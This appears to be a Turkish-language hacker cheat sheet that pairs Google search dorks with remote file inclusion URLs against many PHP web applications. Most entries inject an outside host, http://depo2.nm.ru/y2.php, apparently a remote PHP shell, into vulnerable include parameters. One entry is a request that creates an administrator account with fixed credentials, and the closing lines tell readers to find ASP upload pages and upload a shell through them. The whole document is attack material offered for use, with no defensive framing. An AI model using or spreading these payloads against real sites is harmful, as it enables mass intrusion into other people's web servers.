_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = lang.php
RFI KOD = /components/com_securityimages/lang.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = general.php
RFI KOD= /polaring_dir/view/general.php?_SESSION['dirMain']=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = template.php
RFI KOD= /webnews/template.php?content_page=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = mysql.php
RFI KOD = /zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = /src/Login.php
RFI KOD = /dir_spaminator/src/Login.php?page=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = BaseCommand.php
BaseLoader.php
BaseView.php
RFI KOD = /dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = article-raw.php
RFI KOD = /Dir_phNNTP/article-raw.php?file_newsportal=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = phpMyProfiler
RFI KOD = /[path]/functions.php?pmp_rel_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = activeutil.php?
RFI KOD = /[path]/lib/activeutil.php?set[include_path]=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = pagename
RFI KOD = /index.php?pagename=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = help.mgm.php
RFI KOD = /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması =selectlang.php
RFI KOD = : /[target]/[path]/lib/selectlang.php?BBC_LANGUAGE_PATH=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = serveroffline.php
RFI KOD = /PaTh/index.php?rootpath=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = ezboard-parse
RFI KOD = /ezconvert/config.php?ezconvert_dir=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = inurl:thebox/thebox.php
RFI KOD = /admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = powered by geeklog
RFI KOD = /system/libraries/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=http://depo2.nm.ru/y2.php?
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
Google araması = inhalt.php
RFI KOD = /[target]/[path]/inhalt.php?dateien[news]=http://depo2.nm.ru/y2.php?
-----------------------------------------------------------------------------------------------------------------
Google Arama Kodları:
upload.asp
upload_file.asp
Kesin Bişey İçin public/upload_file.asp
Çıkan Upload Bölümünden Efsoyu Upload Ediyorsunuz
+rap pls
